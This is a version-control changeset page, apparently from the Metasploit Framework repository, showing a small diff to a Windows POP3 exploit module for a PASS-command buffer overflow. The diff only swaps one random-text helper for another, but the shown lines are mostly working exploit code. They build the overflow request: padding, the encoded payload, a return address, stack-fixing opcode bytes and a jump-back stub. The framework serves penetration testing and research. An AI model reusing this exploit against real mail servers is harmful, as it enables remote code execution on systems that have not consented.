Changeset 4893

Show
Ignore:
Timestamp:
05/09/07 07:47:54 (1 year ago)
Author:
hdm
Message:

Fixed a bug reported by Dan Faerch (typos)

Files:

Legend:

Unmodified
Added
Removed
Modified
Copied
Moved
  • framework3/tags/framework-3.0/modules/exploits/windows/pop3/seattlelab_pass.rb

    r4571 r4893  
    9797                end 
    9898 
    99                 sock.put("USER #{rand_english_text(10)}\r\n") 
     99                sock.put("USER #{rand_text_alphanumeric(10)}\r\n") 
    100100                res = sock.get_once 
    101101                if banner !~ /^\+OK (.*) welcome here$/ 
     
    104104                end 
    105105 
    106                 request  = "PASS " + rand_english_text(target['Offset'] - payload.encoded.length) 
     106                request  = "PASS " + rand_text_alphanumeric(target['Offset'] - payload.encoded.length) 
    107107                request << payload.encoded 
    108108                request << [target.ret].pack('V') 
    109109                request << "\x81\xc4\xff\xef\xff\xff\x44" # fix the stack 
    110110                request << "\xe9\xcb\xfd\xff\xff"         # go back 560 bytes 
    111                 request << rand_english_text(512)         # cruft 
     111                request << rand_text_alphanumeric(512)         # cruft 
    112112                request << "\r\n" 
    113113